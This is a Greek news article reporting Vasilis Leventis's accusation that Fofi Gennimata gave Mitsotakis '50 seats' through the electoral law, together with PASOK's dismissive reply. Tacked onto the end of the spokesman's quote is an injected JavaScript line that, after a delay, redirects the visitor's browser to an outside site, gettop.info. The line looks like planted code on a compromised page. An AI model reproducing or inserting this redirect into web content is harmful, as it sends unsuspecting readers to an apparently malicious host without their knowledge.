Λεβέντης κατά Γεννηματά για εκλογικό νόμο – ΠΑΣΟΚ: Δεν ασχολούμαστε με γραφικούς λεβέντες (ΒΙΝΤΕΟ)

0
12

 

Επίθεση εναντίον της προέδρου του ΠΑΣΟΚ Φώφης Γεννηματάα εξαπέλυσε ο πρόεδρος της Ένωσης Κεντρώων Βασίλης Λεβέντης, μιλώντας σε εκπομπή του ΣΚΑΪ και με αφορμή την ψήφιση του εκλογικού νόμου:

«Η Γεννηματά έχει έρθει σε συμφωνία με τον Μητσοτάκη. Η Γεννηματά έκανε ένα μεγάλο έγκλημα. Έδωσε 50 έδρες δώρο στον Μητσοτάκη. Αν δεν είχε δοθεί αυτό, ο Μητσοτάκης θα ερχόταν τώρα στην οικουμενική κυβέρνηση. Θα είναι κύριο θέμα των εκλογών το ότι έδωσε η Γεννηματά δώρο 50 έδρες στον Μητσοτάκη. Υποκρύπτει συμφωνία διότι τέτοιο δώρο μόνο με συμφωνία μπορείς να το δώσεις, αλλιώς είσαι βλαξ«.

Επίσης, ο κ. Λεβέντης κατήγγειλε τον Σύνδεσμο Ελλήνων Βιομηχάνων: «Μου είπε ο ΣΕΒ να μην στηρίξω την απλή αναλογική, να κάνω πίσω. Για ποιο λόγο μου το είπαν; Οι βιομήχανοι αγαπάνε τον Μητσοτάκη. Με πλησίασαν και μου είπαν «άλλαξε πορεία, αν θες τη βοήθειά μας«.

Λεβέντης: Η Γεννηματά έχει έρθει σε συμφωνία με… από Enikos_gr

Απάντηση στην επίθεση προς το πρόσωπο της κυρίας Γεννηματά έδωσε ο εκπρόσωπος Τύπου του ΠΑΣΟΚ Παύλος Χρηστίδης, τονίζοντας: «Οι συνεχείς χυδαίες προσωπικές επιθέσεις στην Φ. Γεννηματά του πρώην πολιτευτή της ΝΔ και όψιμου αβανταδόρου του κ. Τσίπρα, είναι ανάξιες απάντησης. Ένα μόνο σχόλιο: Δεν ασχολούμαστε με γραφικούς «λεβέντες»… «Των δε αχρείων ο ψόγος έπαινος εστί, ο δε έπαινος ψόγος»» setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here